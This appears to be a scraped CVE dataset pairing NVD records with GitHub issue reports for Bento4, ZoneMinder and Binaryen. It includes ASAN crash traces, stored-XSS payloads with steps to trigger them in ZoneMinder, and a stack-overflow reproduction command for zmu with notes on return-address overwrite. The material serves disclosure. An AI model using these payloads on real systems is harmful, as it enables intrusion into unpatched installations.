0x621000000000-0x621000020000
0x621000020000-0x631000000000
0x631000000000-0x631000030000
0x631000030000-0x640000000000
0x640000000000-0x640000003000
0x7ff016000000-0x7ff016100000
0x7ff016200000-0x7ff016300000
0x7ff01635e000-0x7ff0186b0000
0x7ff0186b0000-0x7ff0187b8000 /lib/x86_64-linux-gnu/libm-2.23.so
0x7ff0187b8000-0x7ff0189b7000 /lib/x86_64-linux-gnu/libm-2.23.so
0x7ff0189b7000-0x7ff0189b8000 /lib/x86_64-linux-gnu/libm-2.23.so
0x7ff0189b8000-0x7ff0189b9000 /lib/x86_64-linux-gnu/libm-2.23.so
0x7ff0189b9000-0x7ff0189bc000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ff0189bc000-0x7ff018bbb000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ff018bbb000-0x7ff018bbc000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ff018bbc000-0x7ff018bbd000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ff018bbd000-0x7ff018bd5000 /lib/x86_64-linux-gnu/libpthread-2.23.so
0x7ff018bd5000-0x7ff018dd4000 /lib/x86_64-linux-gnu/libpthread-2.23.so
0x7ff018dd4000-0x7ff018dd5000 /lib/x86_64-linux-gnu/libpthread-2.23.so
0x7ff018dd5000-0x7ff018dd6000 /lib/x86_64-linux-gnu/libpthread-2.23.so
0x7ff018dd6000-0x7ff018dda000
0x7ff018dda000-0x7ff018f9a000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ff018f9a000-0x7ff01919a000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ff01919a000-0x7ff01919e000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ff01919e000-0x7ff0191a0000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ff0191a0000-0x7ff0191a4000
0x7ff0191a4000-0x7ff0191ba000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7ff0191ba000-0x7ff0193b9000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7ff0193b9000-0x7ff0193ba000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7ff0193ba000-0x7ff01952c000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
0x7ff01952c000-0x7ff01972c000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
0x7ff01972c000-0x7ff019736000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
0x7ff019736000-0x7ff019738000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
0x7ff019738000-0x7ff01973c000
0x7ff01973c000-0x7ff019830000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0
0x7ff019830000-0x7ff019a30000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0
0x7ff019a30000-0x7ff019a33000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0
0x7ff019a33000-0x7ff019a34000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0
0x7ff019a34000-0x7ff01a6a9000
0x7ff01a6a9000-0x7ff01a6cf000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ff01a81a000-0x7ff01a8b8000
0x7ff01a8b8000-0x7ff01a8ce000
0x7ff01a8ce000-0x7ff01a8cf000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ff01a8cf000-0x7ff01a8d0000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ff01a8d0000-0x7ff01a8d1000
0x7ffc5d59c000-0x7ffc5d5bd000 [stack]
0x7ffc5d5c2000-0x7ffc5d5c4000 [vvar]
0x7ffc5d5c4000-0x7ffc5d5c6000 [vdso]
0xffffffffff600000-0xffffffffff601000 [vsyscall]
==56305==End of process memory map.
==56305==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_posix.cc:121 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
#0 0x7ff0197dc631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631)
#1 0x7ff0197e15e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3)
#2 0x7ff0197e9611 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xad611)
#3 0x7ff01975ec0c (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22c0c)
#4 0x7ff0197d54fe in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x994fe)
#5 0x550cef in AP4_Array<AP4_ElstEntry>::EnsureCapacity(unsigned int) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4Array.h:172
#6 0x550017 in AP4_ElstAtom::AP4_ElstAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ElstAtom.cpp:73
#7 0x54fd41 in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ElstAtom.cpp:51
#8 0x522fcb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:545
#9 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221
#10 0x4891c3 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:194
#11 0x488c78 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:139
#12 0x488805 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:88
#13 0x523eba in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:764
#14 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221
#15 0x4891c3 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:194
#16 0x488c78 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:139
#17 0x4a2174 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4TrakAtom.cpp:165
#18 0x524ab5 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4TrakAtom.h:58
#19 0x52231f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:379
#20 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221
#21 0x4891c3 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:194
#22 0x488c78 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:139
#23 0x530ca3 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4MoovAtom.cpp:80
#24 0x524a59 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4MoovAtom.h:56
#25 0x522198 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:359
#26 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221
#27 0x5207c7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:151
#28 0x48f2c5 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4File.cpp:104
#29 0x48ef34 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4File.cpp:78
#30 0x45eebd in main /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1846
#31 0x7ff018dfa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#32 0x4549e8 in _start (/home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls+0x4549e8)
```
FoundBy: [email protected] | failed to allocate LargeMmapAllocator in Ap4Array.h at Bento4 v1.5.1-628 when running mp42hls | https://api.github.com/repos/axiomatic-systems/Bento4/issues/361/comments | 1 | 2019-01-25T07:49:22Z | 2019-12-26T14:50:59Z | https://github.com/axiomatic-systems/Bento4/issues/361 | 403,042,062 | 361 |
CVE-2019-6990 | 2019-01-28T20:29:00.310 | A stored-self XSS exists in web/skins/classic/views/zones.php of ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code in a vulnerable field via a crafted Zone NAME to the index.php?view=zones&action=zoneImage&mid=1 URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/a3e8fd4fd5b579865f35aac3b964bc78d5b7a94a"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2444"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2444 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
In the view `zone`, an user can add/view/delete zones. While adding a zone, there exists no input filtration, allowing an attacker to inject unintended values. Later while displaying the zone names on the webpage,there exists no output filtration, leading to Self - Stored based XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=zones&action=zoneImage&mid=1
Payload used - `"><img src=x onerror-prompt('1');>`
- Navigate to the Affected URL
- Click on `Add a new zone` (pop-up appears)
- Add the XSS payload into the `NAME` field & select any of option from the `Type` dropdown field & click on save.
- Navigate back to the Affected URL, payload would be triggered.
<img width="638" alt="zones" src="https://user-images.githubusercontent.com/47003572/51701075-a3cdb100-2036-11e9-8bc6-796486fed4a6.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Stored Self-Cross Site Scripting (XSS) - zones.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2444/comments | 0 | 2019-01-24T18:48:25Z | 2019-01-25T13:15:12Z | https://github.com/ZoneMinder/zoneminder/issues/2444 | 402,845,981 | 2,444 |
CVE-2019-6991 | 2019-01-28T20:29:00.373 | A classic Stack-based buffer overflow exists in the zmLoadUser() function in zm_user.cpp of the zmu binary in ZoneMinder through 1.32.3, allowing an unauthenticated attacker to execute code via a long username. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2478"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/pull/2482"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2478 | [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
A Stack overflows occur when variable size data is copied into fixed length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally considered to be of high severity since their exploitation would mostly permit arbitrary code execution or Denial of Service.
**To Reproduce**
_Affected Binary_ - zmu
An attacker can exploit the buffer by smashing the stack and modifying the return address of the function. This can be used to call some other function, like pointing the return address to some custom shellcode, injected into the stack.
_In function_: `zmLoadUser()`
_Vulnerable function_: `mysql_real_escape_string()`
_Detail_: The vulnerability exists in function `zmLoadUser()`, in `zm_user.cpp`, while authenticating the user. The vulnerability exists in the login functionality. Once a username & password is supplied to the zmu binary, the username & password is passed through `mysql_real_escape_string()` function in order to produce an escaped SQL string. Due to absense of any protection and limitation placed to the length of username & password, there exists a stack based buffer overflow.
_Vulnerable code -_
```
char safer_username[65];
mysql_real_escape_string(&dbconn, safer_username, username, strlen( username ) );
```
```
char safer_password[129];
mysql_real_escape_string(&dbconn, safer_password, password, strlen( password ) );
```
<img width="742" alt="stack" src="https://user-images.githubusercontent.com/47003572/51722837-c84c7c00-207c-11e9-9cff-76a3a1a102e4.png">
<img width="673" alt="stack 2" src="https://user-images.githubusercontent.com/47003572/51722836-c7b3e580-207c-11e9-9216-2bd43f5e1568.png">
_Setup_ -
We need to compile the binary from source, using custom flags, inorder to trigger & debug the vulnerability.
_Steps to compile_ -
- mkdir build (In zoneminder directory)
- cd build
- cmake .. -DCMAKE_C_FLAGS="-fsanitize=address -g -O0 -fno-stack-protector" -DCMAKE_CXX_FLAGS="-fsanitize=address -g -O0 -fno-stack-protector"
- cd src/
_Command to run_ - ./zmu -U $(python -c "print 'a'*645") -P admin
_Root Cause Analysis_ -
Vulnerable function syntax - unsigned long mysql_real_escape_string(MYSQL *mysql, char *to, const char *from, unsigned long length)
Characters in the `from` argument are escaped & the result is placed in the `to` argument, of the length specified, followed by a terminating null byte .
As per the Mysql documentation,
"The string pointed to by `from` must be length bytes long.
You must allocate the `to` buffer to be at least length*2+1 bytes long.
(In the worst case, each character may need to be encoded as using two bytes, and there must be room for the terminating null byte.) When mysql_real_escape_string() returns, the contents of to is a null-terminated string."
But as per the current code, the length is calculated form the lenth of the `username` & `password`(from) argument & can exceed more than the `safer_username` & `safer_password` (to) limit, which is an fixed array (safer_username[65] & safer_password[129]), causing stack based buffer overflow.
By looking at the comments written in `zmLoadUser()` function (zm_user.cpp), the `to` argumunt array is calculated based upon the current db username size, which is of 32. Following what's said in the documentation (length*2+1 bytes long), 2*32+1 = 65 is the limit set for the `to` argument - safer_username (same for safer_password). Ignoring the fact that there's no limit set for the username, password input received to the binary.
```
93
94 // According to docs, size of safer_whatever must be 2*length+1 due to unicode conversions + null terminator.
→ 95 mysql_real_escape_string(&dbconn, safer_username, username, strlen( username ) );
96
97 if ( password ) {
```
```
gef➤ p username
$9 = 0xbffff5ee 'a'
gef➤ p safer_username
$17 = 'a'
gef➤ p/d strlen( username )
$19 = 645
```
Initially the username & password pointer address remains valid, until it reaches safer_username, populating other pointer addresses with the injected payload.
```
95 mysql_real_escape_string(&dbconn, safer_username, username, strlen( username ) );
96
// password=0xbffef344 → "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
→ 97 if ( password ) {
98 char safer_password[129]; // current db password size is 64
```
```
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x80d2a17 → zmLoadUser(username=0x61616161 <error: Cannot access memory at address 0x61616161>, password=0x61616161 <error: Cannot access memory at address 0x61616161>)
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ x/150wx safer_username
0xbffef15b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef16b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef17b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef18b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef19b: 0x61616161 0x61616161 0x61616161 0x61616161
.
.
.
.
.
.
0xbffef32b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef33b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef34b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef35b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef36b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef37b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef38b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef39b: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffef3ab: 0x61616161 0x61616161
gef➤ x 0xbffef34b - 0x17 //Offset to Address of password
0xbffef334: 0x61616161
```
Here we can see, how the pointer address values are populated with the injected values (a's) . Later the code, when the pointer addresses are accessed, segmentation fault is raised due to an invalid memory access.
**Expected behavior**
- An attacker can Bypass authentication by overwriting the function pointer. It should limit the username limit.
**Debug Logs**
```
None
``` | Stack based buffer Overflow - /src/zm_user.cpp (zmu) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2478/comments | 1 | 2019-01-25T03:16:25Z | 2019-01-25T13:48:05Z | https://github.com/ZoneMinder/zoneminder/issues/2478 | 402,988,560 | 2,478 |
CVE-2019-6992 | 2019-01-28T20:29:00.437 | A stored-self XSS exists in web/skins/classic/views/controlcaps.php of ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code in a vulnerable field via a long NAME or PROTOCOL to the index.php?view=controlcaps URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/8c5687ca308e441742725e0aff9075779fa1a498"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2445"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2445 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `controlcaps`, displays the `Protocol` field record with no proper filtration, leading to Self - Stored XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=controlcaps
Payload used - `"><img src=x onerror=prompt('1');>`
- Navigate to the - http://localhost/zm/index.php?view=controlcap
- Populate the `NAME` & `PROTOCOL` fields with the XSS payload & save.
- Navigate to the Affected URL, payload would be triggered.
<img width="513" alt="control 1" src="https://user-images.githubusercontent.com/47003572/51702202-33745f00-2039-11e9-8a2b-646f4b333b4c.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Stored Self-Cross Site Scripting (XSS) - controlcaps.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2445/comments | 0 | 2019-01-24T18:53:08Z | 2019-01-25T13:35:10Z | https://github.com/ZoneMinder/zoneminder/issues/2445 | 402,847,762 | 2,445 |
CVE-2019-7151 | 2019-01-29T00:29:00.517 | A NULL pointer dereference was discovered in wasm::Module::getFunctionOrNull in wasm/wasm.cpp in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1881"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/WebAssembly/binaryen/issues/1881 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Null pointer Deference problem was discovered in wasm::Module::getFunctionOrNull(wasm::Name). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "wasm-opt $POC" to reproduce the problem.
[POC.zip](https://github.com/WebAssembly/binaryen/files/2776554/POC.zip)
git log:
```
commit 0e5e55053c171b138a0cf5aa8a08de8c7714048f
Author: Alon Zakai <[email protected]>
Date: Sat Jan 19 05:30:43 2019 -0800
Show a proper error on an invalid type in binary reading ; fixes #1872 (#1874)
```
The ASAN dumps the stack trace as follows:
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==9622==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005b1a51 bp 0x7ffe832e8c10 sp 0x7ffe832e8380 T0)
==9622==The signal is caused by a READ memory access.
==9622==Hint: address points to the zero page.
#0 0x5b1a50 in __interceptor_strcmp.part.253 /home/wencheng/Documents/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:414
#1 0x9112ce in cashew::IString::operator<(cashew::IString const&) const /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/istring.h:123:12
#2 0x9112ce in std::less<wasm::Name>::operator()(wasm::Name const&, wasm::Name const&) const /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_function.h:386
#3 0x9112ce in std::_Rb_tree<wasm::Name, std::pair<wasm::Name const, wasm::Function*>, std::_Select1st<std::pair<wasm::Name const, wasm::Function*> >, std::less<wasm::Name>, std::allocator<std::pair<wasm::Name const, wasm::Function*> > >::_M_lower_bound(std::_Rb_tree_node<std::pair<wasm::Name const, wasm::Function*> >*, std::_Rb_tree_node_base*, wasm::Name const&) /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_tree.h:1872
